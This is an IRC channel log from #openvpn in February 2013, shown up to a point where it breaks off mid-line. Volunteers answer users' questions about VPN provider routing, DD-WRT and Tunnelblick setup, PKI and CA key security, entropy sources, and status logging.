[~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 17:53 -!- sickness\ is now known as Sickness\ 17:58 -!- oomph [~jr@23.30.10.209] has quit [Quit: oomph] 17:58 -!- Sickness\ is now known as sickness\ 18:02 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:05 -!- sickness\ is now known as Sickness\ 18:15 -!- Sickness\ is now known as sickness\ 18:20 -!- sickness\ is now known as Sickness\ 18:21 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 18:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 18:26 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn 18:26 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 18:44 -!- gardar [~gardar@gardar.net] has quit [Ping timeout: 245 seconds] 18:45 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving] 18:47 -!- Devastator [~devas@177.18.196.246] has quit [Changing host] 18:47 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 18:48 -!- Sickness\ is now known as sickness\ 18:49 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 19:04 -!- nickanderson_afk is now known as nickanderson 19:10 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has joined #openvpn 19:11 -!- AsadH is now known as zz_AsadH 19:16 -!- julius_ [~julius@141.41.92.122] has quit [Read error: Connection reset by peer] 19:19 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has quit [Quit: oomph] 19:29 -!- nagwillow [~nagwillow@46.246.116.223] has joined #openvpn 19:29 < nagwillow> !welcome 19:29 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 19:29 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 19:30 < nagwillow> !howto 19:30 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 19:34 < nagwillow> !ask 19:34 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 19:39 < nagwillow> I'm having issues with DCC sending. When I'm not using OpenVPN I have no problem. However, once I connect, my DCC sends just time out. 19:42 -!- mode/#openvpn [-o pekster] by ChanServ 19:43 <+pekster> nagwillow: redirecting your gateway across the VPN? 19:47 < nagwillow> Hmmm, I'm not sure. I just downloaded the privacy.io config file and crossed my fingers. How can I check? 19:47 <+pekster> Sounds like a firewall on the server-side, is my guess 19:48 <+pekster> We aren't really able to support someone else's network (you're using your providers network which you don't control, so nothing on their side can be verified as you don't have a login to their host.) 19:48 -!- raidz is now known as raidz_away 19:49 < nagwillow> Gotcha 19:49 <+pekster> Life gets harder if they're using rfc1918 space for your VPN IP too, since it's NAT in addition to a firewall on their end 19:50 <+pekster> So: it's your provider that's causing the issue. If you check your logs at 'verb 4' I'm almost certain you'll see a 'redirect-gateway' reply in the PUSH-REPLY 19:53 < nagwillow> "Tue Feb 05 20:13:30 2013 PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1 bypa"....etc 19:53 < nagwillow> ? 19:59 <+pekster> There you go. You're redirecting traffic through your peer, and they obviously don't support the return DCC traffic 20:00 <+pekster> See --redirect-gateway in the manpage, but it's exactly as I suggested earlier. So: 20:00 <+pekster> !provider 20:00 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 20:01 < nagwillow> Ah I see. Thanks for the help. Is there a recommended provider (free or otherwise) which would be a working alternative? 20:02 -!- nickanderson is now known as nickanderson_afk 20:02 <+pekster> No clue. I have no idea how they manage their firewalls or handle NAT issues, or which ones give clients public IPs 20:03 < nagwillow> Ok. Thanks for the help, pekster. 20:03 -!- nagwillow [~nagwillow@46.246.116.223] has quit [] 20:07 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 20:08 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Read error: Connection reset by peer] 20:09 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 20:15 -!- u0m3 [~Radu@92.80.123.64] has quit [Ping timeout: 245 seconds] 20:45 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 20:53 -!- kevinch [~kevinch@d24-57-197-43.home.cgocable.net] has joined #openvpn 20:53 < kevinch> !welcome 20:53 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 20:53 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 20:53 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 20:54 < kevinch> !ask I would like to setup a openvpn on ddwrt to a mac 20:54 < kevinch> hi all 20:55 < kevinch> I'm setting up openVPN server on DD-WRT and trying to VPN in with a mac using tunnelblick 20:55 < kevinch> not entirely sure on exact directions, I made the keys and such using an ubuntu machine 20:55 < kevinch> followed instructions on DDWRT wiki 20:56 <+pekster> You essentially follow the official OpenVPN howto, just create the server-config on the dd-wrt. I've done openvpn+openwrt before, although I write my own configs and initscripts because the abstractions and GUIs are a pain 20:56 <+pekster> !howto 20:56 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 20:57 < kevinch> okay thanks Ill take a look, mind if I ask some questions along the way as I work through the guide? 20:58 <+pekster> If it's something the official howtwo explains I'll likely just refer you there. That said, are you confused on a particular part of the setup? 20:58 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [] 20:58 < kevinch> Just one question, for testing purposes can I try to get into my VPN from my local network? 20:59 <+pekster> Generally yes, although if you use the --redirect-gateway option, see the 'local' parameter in the manpage as you're likely to want that 21:00 <+pekster> It's not a good way to test external access of course, but otherwise you can establish a connection that way 21:01 < kevinch> okay thanks, just to make sure all my keys are correct and such. Also the questions that i was asked when I generated the keys, do those all have to have the same answers? If I put a different one by mistake or something should I regenerate them all? 21:03 <+pekster> Nothing really matters except the common name which needs to be unique for your certs (at least without hackish solutions) 21:03 <+pekster> If you do per-client rules (by way of ccd files or a --client-connect script) you'll need to refer to each client by its CN 21:03 < kevinch> okay thanks 21:03 < kevinch> its more to generate the random keys? 21:03 <+pekster> See the PKI part of the official howto for specifics 21:03 < kevinch> thank you 21:04 <+pekster> Well, they're not random, they're very specifically mathematically related with random primes used in the process, but sure, "random" is close enough :P 21:04 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 256 seconds] 21:07 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 21:09 < kevinch> haha okay 21:20 < Devastator> is it correct to say that it is not advisable to build cert/keys on the same machine openvpn runs? 21:21 < kevinch> couldn't get my connection to work 21:21 < kevinch> https://gist.github.com/anonymous/c63a6ec2ea26e31a2599 21:21 <@vpnHelper> Title: gist:c63a6ec2ea26e31a2599 (at gist.github.com) 21:21 <+pekster> Ideally you want your PKI on a separate system, but small installations sometimes ignore this. It is wise to generate your keys on the system that will use them and just send the request and cert across the wire 21:21 < kevinch> mind if you could take a quick peak pekster if you have a spare second 21:23 < kevinch> meh ill just try it tomorrow and play around a bit more with hit 21:23 -!- kevinch [~kevinch@d24-57-197-43.home.cgocable.net] has left #openvpn [] 21:24 <+pekster> 125 seconds is apparently too long for a reply. Oh well, my Ctrl-U still works nicely :) 21:27 < Devastator> pekster by "send the request and cert across the wire" you mean.. upload it? 21:28 <+pekster> Yea. There's no reason for a private key to be send over the network 21:28 <+pekster> It's just generally bad practice 21:31 < Devastator> yes, that's exactly why I'm asking.. 21:32 < Devastator> there is no point in having something to secure things if I don't follow good practices 21:34 < Devastator> so just to be sure, it will be like: #1 - install and configure server, #2 - go to the client machine, generate keys and cert, #3 - connect to the server with ftp, scp or whatever to upload the cert, #4 - connect to the vpn 21:34 < Devastator> something like that?! 21:35 <+pekster> The cert is signed by the CA 21:36 <+pekster> You generate the keypair and a CSR (Certificate Signing Request, sometimes called a .csr or .req file.) This is not sensitive, and sent (often in the clear) to the CA. The CA verifies this came from the client (eg: verbal verification of the fingerprint) and then signs it, producing a valid certificate. This is then sent (possibly in the clear) back to the client 21:36 <+pekster> Only the private keys are "secret" -- everything else in a PKI can be considered public 21:37 <+pekster> eg: attackers on the wire can actually swipe your public certificates exchanged between the clients 21:40 < Devastator> pekster pardon for such a lame question but.. can the CA be also called "openvpn server"? 21:41 <+pekster> They're completely separate. You may run them both on the same system if you'd like; the CA is merely a collection of files including, critically, the CA private key 21:41 <+pekster> The thing to remember is that compromise of your CA key compromises the entire infrastructure; compromise of a single non-CA keypair only compromises that client and the rest of the PKI is still secure 21:42 <+pekster> Application servers running a VPN tend to run more software than a CA does. You can even keep your CA PKI on an offline system stored on an encrypted USB drive kept in a vault, if you need that level of security 21:46 < Devastator> I did read the howto a few times, I did try to understand all, can I make a list of dumb questions on a pastebin then get back to you? 22:03 < Devastator> heheh I guess not.. 22:05 <+pekster> Easier to ask here. You may even get answers, in between my glasses of wine and reading about DL14 22:06 <+pekster> Erm, DA14. That big round thing hurling just to the side of our planet 22:08 < Devastator> heheheh 22:24 < Devastator> PKI is kind of.. environment to build keys, certs, requests. CA PKI is part of PKI, to validate those certs, requests. am I understanding it correctly? The terminology confuses me a little, bear in mind I've never messed with VPN before 22:27 <+pekster> PKI = Public Key Infrastrucutre. The CA is the Central Authority, also often used to refer to the keypair at the "root" of the PKI. This CA is ultimately trusted by all peers (your servers and clients.) 22:28 <+pekster> All the keys are X.509 keypairs. There's actually nothing magic about the CA verses any of your other keypairs. It's just how they're layed out. The CA signs (cryptographically) each cert, and in the case of openvpn, adds some extra options that designate each certificate a "server" or "client" certificate, indicating what it's purpose is 22:28 <+pekster> Wikipedia probably gives you a better more basic desscription of X509 and PKI if you need 22:32 < Devastator> thanks! 22:33 < Devastator> well, creating a PKI on each client isn't much handful I guess 22:34 < Devastator> leaving PKI on the server itself is not recommended at all.. 22:35 <@krzee> !tell krzee [hmac] 22:36 <@krzee> too lazy for msg syntax D 22:36 <@krzee> :D 22:40 < Devastator> pekster what would you do if you don't have a offline system to put the PKI there? 22:43 <@krzee> get one, or choose whatever you consider to be the next best thing to be it 22:46 <+pekster> I have an online "admin" host internally. It doesn't run much, has slightly higher security standards. Some of my PKI runs of there, some of it is just an intermediate CA with offline roots kept in a secure location 22:47 <+pekster> Locked vaults and armed gards are not suitable for every installation ;) 22:47 <+pekster> guards. First of many typos tonight I'll blame on the wine 22:47 < Devastator> hahahah 22:47 < Devastator> don't worry 22:48 < Devastator> I'm just trying to figure a way of doing so it can be portable and easy to generate/sign certs etc etc 22:49 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:49 <+pekster> Run it all off your VPN server if you'd like. That's not appropriate in larger deployment situations, and most companies (even medium-ish ones 50+ employees) tend to have policies about such things 22:50 <+pekster> There's nothing "wrong" about doing it like that, it's just not as secure in the event your VPN server (that also houses your PKI and CA root key) is compromised. Then you hope you discover the compromise before your key is brute-forced, and your server key can be assumed compromised anyway 22:52 < Devastator> if it were all linux clients.. but it's almost all windows, my idea would be to have PKI on a pendrive, then go to the client that I want to generate cert/request and use the PKI from the pendrive 22:53 <+pekster> THat's a pain since frontends will be different on each host to manipulate your PKI, plus different openssl versions may have slightly different featuresets 22:54 <+pekster> In other words, you probably don't want to do that 22:54 <+pekster> Either do it all on a single box (like the official howto shows you) or learn more about what the CA actually does when it gets a CSR and signs it, generating the valid cert 22:55 <@krzee> !tell krzee [dh] 22:56 * pekster always imagine a prime sliding into home plate and an umpire yelling "Safe!" whenever openssl generates "safe primes" for diffie-hellman params 22:57 < Devastator> pekster ok, just to be sure again, and the official howto is not recommended because everything that an attacker needs will be there.. 22:57 <+pekster> It's recommended if you don't really know what you're doing 22:57 <+pekster> From a security perspective, you split your critical infrastructure bits onto systems you deem secure enough 22:58 < Devastator> yes, time to know what I'm doing 22:58 <+pekster> Choose between doing it all on the server (convenient, less hardware and time required, but least secure) to using a completely offline CA on an encrypted disk stored in an armed, locked, biometric vault with security cameras (most secure, also the least user-friendly and most expensive.) 22:58 <+pekster> Or do something between those 2 extremes 22:59 -!- gardar [~gardar@gardar.net] has joined #openvpn 22:59 <+pekster> Or pay a company to do it all for you. Possibly very convenient, but out of your control and not free ;) 23:00 <@krzee> lol at umpire yelling "SAFE!" 23:01 < Devastator> something between those 2 extremes seems ok, will look into it 23:02 < Devastator> I will follow the howto for now, just to get the hang of configuring it at least 23:02 <+pekster> You can put it on a USB stick and boot a laptop off a live-CD for a middle-of-the-road approach 23:02 <+pekster> Encrypt the USB stick for another layer of protection, but the CA key has its own passphrase, unless you explicitly use -nodes with openssl 23:02 < Devastator> that seems doable 23:02 <+pekster> Ubuntu has Live-CDs, and rumor has it they even patched their openssl mess ;) 23:05 <+pekster> There's also xca, a GUI-frontend to generate CAs. I've never tried it, but there's some link to using it with openvpn: 23:05 <+pekster> !xca 23:05 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 23:06 <+pekster> You're less likely to get support for it (the howto is the official reference) but you're free to poke at it if you're willing to keep any broken pieces you end up with 23:06 < Devastator> if I understand anything, if I have a certs generated with Ubuntu version XY, openssl WZ, I will need to use the same openssl version if I want to sign/generate others 23:07 <+pekster> Well, it's more or less "version independent" but you don't want to mix different platforms. Easy-rsa includes the scripts at the top-level, and the .bat files are completely different than the bash scripts 23:07 <+pekster> You can also get surprised with openssl bugs between minor versions and the like. It's unwise to just willy-nilly plug your UBS stick with a PKI into a random machine and start issuing openssl commands 23:08 <+pekster> You don't need that "exact" version of openssl, no. Since you're multi-platform, your OS differences are going to cause you troubles at your skill level. Keep the PKI on one OS 23:08 < Devastator> got it, I'm just thinking if I would need the same live version/distro 23:08 <+pekster> Nope 23:09 < Devastator> alright! 23:10 <+pekster> You can re-do your PKI any time you want; you just need to replace the .key and .crt files on every host, including the ca.crt if you re-generated your CA too 23:10 < Devastator> tomorrow I will buy 2 usb sticks, I will leave one as backup just in case the #1 dies 23:10 <+pekster> I bought a 4-pack of 32 MB USB sticks years ago for offline PKI storage. Something like $5 on sale :) 23:10 < Devastator> 32GB? 23:10 <+pekster> No, 32 MB 23:10 <+pekster> I don't think you can buy them that small anymore ;) 23:11 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 23:11 < Devastator> sorry, I thought it was a wine typo again :) 23:11 < Devastator> indeed 23:11 < Devastator> 1GB should be fine, this will be my only vpn server.. 23:12 < Devastator> it's ok to run it off my router/firewall, right? 23:12 <+pekster> 32M should be fine. the entire PKI takes up less than 1MB even after you issues dozens of certs 23:13 < Devastator> I don't have a services/daemons server.. also, I think 1GB is the smallest I will find hehe 23:14 <+pekster> I wouldn't "turn off" your firewall on any Internet-exposed system, no 23:16 < Devastator> s/off/on 23:16 < Devastator> excuse my english 23:16 <+pekster> http://pekster.sdf.org/misc/usb-32m.jpg 23:20 < Devastator> heheh, not available anymore 23:20 < Devastator> smallest I could find was 256MB 23:21 <+pekster> I have one of those too 23:22 < Devastator> for a few more cents... 4GB.. 23:24 <+pekster> Yea, I know. You can't buy them like you used to 23:24 <+pekster> I dunno what I paid for that blister pack. Maybe $5 after shipping 23:25 <+pekster> 128 MB between the 4 sticks! 23:26 < Devastator> I'm going to buy the smallest I can find, format it with LVM and try 23:30 <+pekster> LVM on USB? Okay... 23:30 < Devastator> hum.. never encrypted anything, it was a long shot heheheh 23:31 <+pekster> You still need an actual filesystem on top of it, unless you plan to hexedit all your keys onto a raw block device... 23:31 <+pekster> Use a normal filesystem unless you know what you're doing. Better yet, start with the howto guide so you know what you're doing before you burn a bunch of bits to the flash memory on your new USB devices 23:32 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:32 -!- mode/#openvpn [+o krzee] by ChanServ 23:32 <+pekster> They keys are already encrypted. An encrypted filesystem gives you more security, another layer to the crown jewels so to speak. The more secure you are the harder it is for an attacker who breaks into your house and steals your offline key storage, and the harder it is for you to use your own PKI. This is your ever-present choice in security 23:33 <+pekster> Buy a safe deposit box. Buy 2, in different cities in case one gets robbed so you still have your backup. etc, etc. 23:33 <@krzee> !tell krzee [sample] 23:34 <+pekster> I'm sure krzee has safe deposit boxes for his PKI ;) 23:34 <@krzee> cameras and offline 23:34 <@krzee> =] 23:35 <@krzee> *flex* 23:35 <@krzee> oh and an armed guard! 23:35 <@krzee> (the guard and the cameras are not for the pki, but it felt like a good place to keep the pki) 23:35 <@krzee> !shotgun 23:35 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun. 23:39 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has joined #openvpn 23:39 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has quit [Client Quit] 23:40 < Devastator> hahahahah 23:47 < Devastator> pekster this is what I might follow after my initial experience with the howto: http://linuxconfig.org/usb-stick-encryption-using-linux 23:47 <@vpnHelper> Title: USB stick encryption using Linux (at linuxconfig.org) 23:51 <@krzee> pekster, played with the ios client? 23:52 <@krzee> when i did it i was able to load the files from itunes, now im somewhere else setting it up on an iphone that has no computer to sync to, yanno if that means i need to put everything in-line myself? 23:53 < Devastator> !howto 23:53 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 23:53 <+pekster> I own no apple devices 23:53 <+pekster> Nor do I want to 23:54 <+pekster> Someday I might need to buy one of those desktop cube-ish things to do Tunnelblick client development, and I'll only do that with a very long face 23:55 <+pekster> krzee: If you find the secret key out of the walled garden, let me know :P 23:55 <@krzee> appletv kicks butt as an xbmc device btw (although i hear theres nicer android devices now) 23:55 <@krzee> secret key walled garden? 23:57 <@krzee> learn inline as see http://www.packtpub.com/article/new-features-of-openvpn-2-1-and-2-2 for some info an putting certs directly into your config file 23:57 <@vpnHelper> Title: New Features of OpenVPN 2.1 and 2.2 | Packt Publishing (at www.packtpub.com) 23:57 <@krzee> heh 23:57 <@krzee> !learn inline as see http://www.packtpub.com/article/new-features-of-openvpn-2-1-and-2-2 for some info an putting certs directly into your config file 23:57 <@vpnHelper> Joo got it. --- Day changed Wed Feb 06 2013 00:00 < Devastator> interesting, there are two KEY_EMAIL in vars, one with ", one without.. 00:00 <@krzee> prolly in different blocks 00:01 < Devastator> can I put the same on both? 00:02 <@krzee> i put not@real 00:02 <@krzee> so sure :-p 00:03 <@krzee> not like openssl is going to send you an email or anything 00:03 <@krzee> its only there for you 00:03 <+pekster> Your X509 details are send in the clear (DER-encoded, but it's not encrypted, so anyone can see the name/city/state/email you use. FYI) 00:04 < Devastator> thanks! for me to not bother you guys for each KEY_, is there a paper explaining each? there's KEY_CN=changeme, but howto doesn't mention it.. 00:05 <+pekster> Leave that; you set it each key you generate 00:05 <+pekster> The howto explains the easy-rsa process 00:05 <+pekster> !howto 00:05 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 00:06 < Devastator> got it, I just changed what howto told me, I will leave the rest as default 00:11 < Devastator> building diffie-hellman 00:14 <@krzee> haha i have 8kb configs now 00:14 <+pekster> krzee: You ever watch that facthacks talk? So much of those keys are redundant anyway 00:15 <@krzee> watched it 3 times 00:15 <@krzee> damn good talk 00:16 <+pekster> Now go re-geneate your keys on any embedded hardware you're using ;) 00:16 <@krzee> got lucky, never used embedded for keygen 00:16 <@krzee> more luck than thinking ahead tho 00:17 <+pekster> I actually looked into it as there's fairly little literature about the entropy problem of Linux+embedded. I found a whitepaper from the mid 2000's though 00:17 <@krzee> makes sense tho 00:17 <+pekster> Here it is: http://eprint.iacr.org/2006/086.pdf 00:23 <@krzee> "Since a physical source of randomness is often too costly, most systems use a pseudo-random number generator." 00:23 <@krzee> umm, arent physical sources of randomness also pseudo-random? 00:25 < Devastator> can I test the vpn from inside the network? 00:25 <@krzee> are you sharing the lan? 00:25 <@krzee> or redirecting internet? 00:26 < Devastator> no, it's internet->wireless router->clients (one of those clients is actually the vpn server) 00:26 <@krzee> what is the purpose of the vpn? 00:26 < Devastator> I'm gonna run it at my company when I'm done with testing 00:26 <@krzee> heh 00:27 <@krzee> !goal 00:27 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 00:27 <@krzee> like that ^ 00:27 < Devastator> sorry, my goal is to access my company's router from home over a secure connection 00:28 <@krzee> ok, so basically sharing the lan 00:28 < Devastator> right now I'm building the actual new company router at home.. before putting it in production 00:29 <@krzee> so nope, cant really test from within the same lan 00:29 <@krzee> you can comment out the lan sharing stuff, and then test 00:29 <@krzee> but you'll need to test to the lan ip 00:29 <@krzee> by "lan sharing stuff" i mean --route and --push "route... 00:30 < Devastator> yes, it's commented out 00:31 < Devastator> let's see 00:36 < Devastator> what's the factoid for windows clients? 00:36 < Devastator> openvpn clients 00:36 <@krzee> !download 00:36 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 00:36 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 00:36 <@krzee> #1 00:36 <+pekster> krzee: See: random.org for RNG, not PRNG ;) 00:37 <@krzee> after i hook up these 2 ipads / 2 iphones to this vpn 00:38 <@krzee> ios = suck 00:38 <+pekster> Hardware RNG card exist to connect to a sound card for instance and use ambiant noise, but for "most" people PRNG is "good enough" 00:38 <@krzee> but thats just another source of entropy 00:38 <@krzee> like a prng can use 00:39 <+pekster> PRNG comes up with the random data based on written computer code. True "random" data comes from atmospheric radiation or the like 00:39 <@krzee> many prng use sources of entropy when doing so 00:40 <@krzee> such as sound card or video card, network card, whatev 00:40 <+pekster> Not really 00:40 < Devastator> I swear I will not be so dumb in a few weeks using vpn :) 00:40 <+pekster> Interrupts, disk I/O delay, keyboard, and mouse are you standard entropy sources for Linux 00:40 <@krzee> the paper you linked to me said it too 00:40 <+pekster> Nothing to do with your sound card 00:40 <+pekster> (in most cases, unless you have specalized hardware) 00:40 <@krzee> most systems use a pseudo-random number generator. The state of the generator is seeded, and periodically refreshed, by entropy which is gathered from physical sources (such as from timing disk operations, or from a human interface). 00:41 <+pekster> Right 00:41 <+pekster> Former = Disk I/O (ie: delay between disk seeks) 00:41 <+pekster> lattter = keyboard+mouse 00:42 <@krzee> there something special about an audio device that it couldnt be used like those? 00:42 <+pekster> One of my 2 headless boxes has low disk I/O, no mouse, no keyboard, and minimal disk activity. The entropy pool is generally very low on that one, compared to the one that does 24/7 torrenting 00:42 <@krzee> (from software) 00:42 <+pekster> Sure: the fact that an audio card is not usually connected to a microphone ;) 00:42 <@krzee> my laptop is 00:42 <+pekster> (Plus more technical issues of normalizing gain, and assuring that it's a valid source of really "random" entropy) 00:42 <@krzee> 24/7 00:43 <@krzee> the hw device would have those hurdles too 00:43 <@krzee> my bob marley song isnt quite random 00:43 <@krzee> regardless of sw or hw 00:43 <+pekster> Not if it has software to figure that all out on integrated chips 00:43 <+pekster> You can't exactly design IC's in the kernel code ;) 00:43 <@krzee> why would said software need to be on chips? 00:44 * krzee smacks himself "back to work krzee!" 00:44 <@krzee> bbiaf =] 00:44 <+pekster> You need to figure out if it's a valid source of random before you use it. A sine wave connected via your audio cable would be Very Bad, for instance 00:45 <@krzee> but ill still be interested in this! 00:45 <+pekster> Debian tried the --just-trust-us option on randomness, and it failed. Badly. 00:45 <@krzee> definitely not trying to get out of the conversation 00:45 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 00:53 < Devastator> how should be the path for windows ca.crt etc etc? Tried C:\Program Files\OpenVPN\, should I put " "? 00:54 <+pekster> The manpage explains that just a couple pages in 00:55 <+pekster> Examples you can almost copy and paste even ;) 00:56 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Quit: No Ping reply in 180 seconds.] 00:56 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 00:57 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 01:01 < Devastator> yep "C:\\....\\" 01:02 < Devastator> thanks! 01:05 < Devastator> it seems to have worked 01:06 < Devastator> windows has a "tap windows adapter" even though I'm using tun, but I guess it's normal 01:08 <+pekster> It's just the nomenclature. The code refers to "tun.c" even for tap-stuff 01:09 < Devastator> I can't thank you guys enough 01:09 < Devastator> that first experience (it's really the first) tought me a lot 01:28 <@krzee> cant find the file [inline] 01:29 * krzee punches ios 01:30 <+pekster> Oh, so. Walled garden: as in "Apple's walled garden." It's so pretty, why would you ever want to leave? 01:30 <@krzee> i guess ill try the other way 01:30 <@krzee> oh dude, i only android 01:30 <@krzee> but these 4 devices arent mine 01:30 <@krzee> i guess i do have an ipod touch too, but that was no problem since i sync to computer 01:30 <@krzee> add files, done 01:30 <+pekster> Just try not to eat the apple, k? :P 01:31 <@krzee> however, for laptop... 01:31 <@krzee> MacBookPro CPU: Intel Core i7 M 620 2.67GHz @ 2.66GHz [SSE3/SSSE3/SSE4.1/SSE4.2/x86_64/PAE/XD/VT/EST/OctaCore] L3: 4MB QPI: 4.8 GT/s RAM: 4.2GB/8.0GB swap: 0.00M/64.00M Disk: 162.28GB/173.85GB GPU: NVIDIA GeForce GT 330M & Intel HD Graphics [512 MB & 288 MB/Stock] 1920x1200 OS: Mac OS X 10.7.5 (11G63) Kernel: 11.4.2 Arch: 64 Bit 01:31 <+pekster> I got briefly excited that you were running 64-bit ArchLinux. Then I so the OS. 01:32 <+pekster> saw* 01:32 -!- hid3 [~arnoldas@78.157.71.116] has joined #openvpn 01:32 <+pekster> It's been a couple versions ago for both Mac OS and Tunnelblick, but I had great results there. The pre-packaged deployment thing was really slick 01:32 < hid3> Hello everyone. Can I disable the status logging each minute on the OpenVPN server? 01:33 <@krzee> dont use --status 01:33 <@krzee> hehe 01:33 <+pekster> I like dumping the --status update to a tmpfs location, like /tmp or /run on modern distros 01:34 < hid3> or /ram (which is a symlink to /dev/shm) 01:34 < hid3> but I've never needed that file, anyway 01:34 < hid3> seems to be a real useless 01:34 <+pekster> It's handy when you want to see if $user is connected, or who has the VPN IP $naughty_person 01:35 <@krzee> !management 01:35 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 01:35 <@krzee> ^ more handy for that 01:35 <+pekster> Not really. 'telnet localhost 9876' status?' 01:35 <@krzee> scripts! 01:35 <+pekster> vs: cat /tmp/vpn1.status? 01:35 <@krzee> expect script 01:35 <+pekster> expect is not as convenient compared to cat. Not in my book :P 01:35 <@krzee> ild be happy to kickdown if interested 01:36 <@krzee> ./showusers.sh 01:36 <@krzee> management interface can do a bit more too ;] 01:36 <@krzee> like disconnect $naughty_person 01:36 <+pekster> Right 01:37 < hid3> okay, so disabled the status log file... 01:37 <+pekster> I also found admins liked to leave hanging shells connected to the management port :\ 01:38 <@krzee> grr i sent all the files via email instead of inline, that doesnt work either 01:38 <+pekster> Sure, I could kill their ssh/screen sessions, but it was better not to encourage that behaviour to begin with ;) 01:38 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 256 seconds] 01:38 <+pekster> And no, I wasn't about to write a multi-user frontend in Java for them to access it with ;) 01:38 <@krzee> me either 01:39 <@krzee> ild do it in bash :D 01:39 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 01:39 <+pekster> Oh yea? http://xkcd.com/378/ 01:39 <@vpnHelper> Title: xkcd: Real Programmers (at xkcd.com) 01:39 <@krzee> butteryfly 01:39 <+pekster> hid3: You were referring to the status file, not something in the logs ever 1/m, right? 01:40 <@krzee> dont need to click :D 01:40 < hid3> pekster: probably. It got updated/truncated each minute. And I only have a few clients for a few hours a few times a year connected... 01:41 <+pekster> Sounds like the status file then. Doesn't hurt much beyond a few CPU cycles, although it'll cauase problems if you wanted disks to spin down or burning holes in flash memory ;) 01:42 < hid3> Yeah... 01:42 < hid3> And besides, I found it only 